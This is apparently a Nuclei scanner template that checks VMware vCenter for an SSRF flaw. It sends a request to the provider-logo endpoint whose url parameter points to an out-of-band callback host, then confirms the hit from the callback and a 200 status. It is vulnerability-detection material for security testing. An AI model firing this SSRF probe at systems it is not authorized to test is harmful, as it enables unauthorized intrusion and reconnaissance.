id: vmware-vcenter-ssrf

info:
  name: VMware vCenter SSRF/LFI/XSS
  author: pdteam
  severity: critical
  reference: https://github.com/l0ggg/VMware_vCenter
  tags: ssrf,lfi,xss,oast

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
